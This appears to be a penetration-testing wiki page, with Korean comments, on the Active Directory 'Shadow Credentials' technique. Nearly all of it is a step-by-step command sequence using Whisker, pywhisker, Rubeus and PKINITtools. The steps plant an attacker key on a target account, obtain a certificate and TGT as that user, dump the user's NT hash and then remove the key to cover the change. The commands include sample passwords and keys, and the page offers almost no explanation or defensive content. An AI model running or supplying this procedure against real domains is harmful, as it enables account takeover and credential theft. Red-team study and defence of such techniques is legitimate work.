Shadow Credentials
Abuse
Root Cause





References
Last updated





Last updated
# 백업을 위해 기존에 등록된 공개키 열거
.\Whisker.exe list /target:Mick3y
# 키 추가
.\Whisker.exe add /target:Mick3y /nowrap
# TGT 요청
.\Rubeus.exe asktgt /user:Mick3y /certificate:MI[...]5I= /password:"oFF2xUVa0dnahRVV" /domain:CONTOSO.COM /dc:AD01.CONTOSO.COM /getcredentials /show
# 생성한 키 정리
.\Whisker.exe remove /target:Mick3y /deviceid:a7df042e-728d-b905-6677-ddc94f00faa0# 백업을 위해 기존에 등록된 공개키 열거
python3 pywhisker.py -d contoso.com -u Administrator -p 'Password123!' -t Mick3y -a list
# 대상의 공개키에 악성 키 등록 및 인증서 발급
python3 pywhisker.py -d contoso.com -u Administrator -p 'Password123!' -t Mick3y -a add
# 인증서를 통해 TGT 덤프
python3 gettgtpkinit.py -cert-pfx VMZ1wJMj.pfx -pfx-pass 'kCHaLlWwNigFN1MdQqte' contoso.com/Mick3y Mick3y.ccache
# 탈취한 TGT로 서비스 티켓을 발급받아 NT 해시 덤프
python3 getnthash.py -key aeb2cd57348d494580264cd754eb9fb73ef3ad5328bc98497f69cb2572dd7194 contoso.com/Mick3y
# 생성한 공개키 제거
python3 pywhisker.py -d contoso.com -u Administrator -p 'Password123!' -t Mick3y -a remove -D f8ffcb53-21e9-a614-dbf7-d24faad68516 typedef struct _PAC_CREDENTIAL_INFO {
ULONG Version;
ULONG EncryptionType;
UCHAR SerializedData[1];
} PAC_CREDENTIAL_INFO, *PPAC_CREDENTIAL_INFO;